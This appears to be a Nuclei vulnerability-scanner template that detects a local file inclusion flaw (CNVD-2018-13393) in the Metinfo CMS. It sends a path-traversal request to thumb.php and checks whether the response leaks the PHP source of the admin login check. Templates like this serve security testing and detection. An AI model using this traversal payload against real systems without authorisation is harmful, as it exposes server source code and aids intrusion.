id: CNVD-2018-13393
info:
  name: Metinfo LFI
  author: ritikchaddha
  severity: high
  reference: https://paper.seebug.org/676/
  tags: metinfo,cnvd,cvnd2018,lfi
requests:
  - method: GET
    path:
      - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "login_met_cookie($metinfo_admin_name);"
        condition: and
